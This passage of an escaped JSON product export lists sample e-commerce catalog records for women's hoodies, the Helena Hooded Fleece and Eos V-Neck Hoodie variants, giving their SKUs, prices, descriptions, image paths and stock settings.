Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1128\":{\"sku\":\"WH10-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XL-Blue\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1129\":{\"sku\":\"WH10-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XL-Gray\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1130\":{\"sku\":\"WH10-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece-XL-Yellow\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helena-hooded-fleece-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1131\":{\"sku\":\"WH10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Helena Hooded Fleece\",\"description\":\"<p>Wear this hoodie after the gym or before a chilly weather bike ride. Either way, this versatile sweatshirt offers an effortlessly appealing silhouette and a super-comfy fit. Smooth, stretchy fabric creates flattering shape, while the full-zip placket and hood help block gusty winds.<\\/p>\\n<p>Full zip. <br \\/>Banded cuffs and waist. <br \\/>Front pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"55\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Full zip,material=Cotton|Polyester|Spandex,pattern=Solid,climate=Cool|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH10-XS-Blue,size=XS,color=Blue|sku=WH10-XS-Gray,size=XS,color=Gray|sku=WH10-XS-Yellow,size=XS,color=Yellow|sku=WH10-S-Blue,size=S,color=Blue|sku=WH10-S-Gray,size=S,color=Gray|sku=WH10-S-Yellow,size=S,color=Yellow|sku=WH10-M-Blue,size=M,color=Blue|sku=WH10-M-Gray,size=M,color=Gray|sku=WH10-M-Yellow,size=M,color=Yellow|sku=WH10-L-Blue,size=L,color=Blue|sku=WH10-L-Gray,size=L,color=Gray|sku=WH10-L-Yellow,size=L,color=Yellow|sku=WH10-XL-Blue,size=XL,color=Blue|sku=WH10-XL-Gray,size=XL,color=Gray|sku=WH10-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh10-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh10-gray_alt1.jpg,\\/w\\/h\\/wh10-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Full zip\",\"material\":\"Cotton|Polyester|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Cool|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1132\":{\"sku\":\"WH11-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XS-Blue\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1133\":{\"sku\":\"WH11-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XS-Green\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1134\":{\"sku\":\"WH11-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XS-Orange\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1135\":{\"sku\":\"WH11-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-S-Blue\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":nul